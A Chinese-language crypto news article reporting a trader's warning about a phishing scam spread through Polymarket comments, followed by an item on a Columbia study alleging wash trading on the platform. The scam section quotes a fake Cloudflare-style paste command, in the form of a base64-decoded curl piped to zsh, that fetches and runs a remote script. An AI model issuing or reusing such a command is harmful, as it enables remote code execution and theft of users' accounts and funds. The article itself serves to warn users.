Polymarket 私人市场中的钓鱼链接：用户发出警报

Polymarket 再次成为新闻焦点，这次是因为其一位网名为“25usdc”的高级交易员发出警告，称有人利用该平台的评论区来欺骗毫无戒心的用户。. 

对于 Polymarket 平台而言，这正值关键时刻，因为它正准备重新进入美国市场，并努力超越 Kalshi 等竞争对手。. 

Polymarket交易员高度警惕 

据 25usdc 报道，黑客一直在利用 Polymarket 的评论区进行诈骗，到目前为止，用户已经损失超过 50 万美元。

“他们会说：‘为什么你不在 Polymarket 私人市场交易？那里的胜算总是高得多！’” 25usdc 写道，然后解释了整个骗局是如何运作的。. 

据他所说，这一切都始于他们用两个不同的账户同时买入同一市场中的“是”和“否”股票。这样，即使启用了“持有者”筛选器，他们的评论仍然会保留。之后，他们会以混淆的形式发布其网站的URL。.

该URL会将毫无戒心的用户引导至一个看似正常的页面，页面上带有Polymarket的标志，并要求用户通过电子邮件登录。电子邮件验证成功后，会弹出一个新窗口，要求用户验证其活动，此举模仿了CloudFlare的提示。. 

然而，25usdc 表示，当您点击“复制”时，复制的命令类似于“curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh”，如果用户错误地将其粘贴到终端中，它首先会解码 base64 编码的字符串（服务器 URL），然后从该服务器获取脚本并立即执行。. 

据称，相关脚本可以包含任何内容，而且不会弹出任何警告，此时损害已经造成，根据 25usdc 的说法，唯一的补救措施可能是关闭 Wi-Fi。. 

“最终，他们会收集数据，记录你系统上的所有操作，并将压缩文件发送回他们的服务器，”25usdc 写道。“然后，他们利用这些数据登录你的账户，窃取你的钱财。”

他还注意到该组织运作得非常谨慎；例如，他们经常更换钱包来掩盖踪迹，每一步都进行混淆，甚至在没有活跃受害者时关闭发送有效载荷和接收日志数据的服务器。.

“我认为解决这个问题的最佳方法是允许受信任的用户审核评论，或者引入一个隐藏被大量踩的帖子的踩赞系统，”25usdc总结道，同时指出Polymarket目前显示的简单 警告 是不够的。 

友情提示：Polymarket 并不存在所谓“私人市场”网站，也没有任何“更高的赔率”。

切勿在除我们官方网站以外的任何地点输入您的 Polymarket 邮箱地址或登录验证码。.

— Polymarket Traders (@PolymarketTrade) 2025年11月9日

一项新研究声称，Polymarket的交易量被虚假交易抬高。

据 Cryptopolitan 报道，哥伦比亚大学研究人员最近发表的一项研究声称，Polymarket 上的交易量因虚假交易而大幅膨胀。 

作者们将这种现象称为“人工交易”，这种交易随时间而变化，但他们表示，在过去三年中，人工交易平均占 Polymarket 所有买卖交易的 25%。. 

该论文尚未经过同行评审，但已上传至开放获取研究平台 SSRN，并正在接受 Polymarket 的审查。. 

需要澄清的是，作者并未直接指控 Polymarket 本身存在虚假交易行为。然而，他们着重指出该交易所基于加密货币的结构中的一些要素，使得这一指控具有一定的合理性。  

他们还表示，该公司的客户可能dent参与了上述虚假交易，试图提高他们获得该公司创始人 Shayne Coplan 于 10 月 8 日暗示可能推出的专有数字代币的机会。. 

“我希望Polymarket能够接受我们论文中的分析，”哥伦比亚大学商学院教授、该论文的四位合著者之一亚什·卡诺里亚在电子邮件中表示。“虚假交易既不会增加市场的流动性，也不会提供信息，因此区分真实交易量和虚假交易量显得尤为重要。”

该研究声称，如果 Polymarket 的部分交易量确实是“虚构的”，那么这可能会改变人们对 Polymarket 在行业中相对实力的理解，并削弱目前预测市场反映“更广泛群体的智慧”的观点。

作者总结道：“大规模虚假交易的可能性意味着交易量可能不足以作为衡量平台真实活动的指标，尤其是在可能缺乏适当保障措施的加密货币交易所中。”.